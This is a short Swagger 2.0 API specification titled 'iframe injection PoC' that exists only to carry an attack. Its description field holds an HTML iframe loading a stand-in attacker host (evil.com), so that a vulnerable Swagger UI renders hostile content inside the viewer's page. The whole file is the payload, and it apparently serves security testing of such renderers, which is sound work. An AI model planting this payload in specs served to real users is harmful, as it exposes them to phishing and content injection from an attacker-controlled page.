swagger: '2.0'
info: 
  version: 1.0.0
  title: iframe injection PoC❗️
  description: |
    <iframe src="https://evil.com" width="600" height="400"></iframe>
paths:
  /:
    post:
      responses:
        '200':
          description: PoC successful
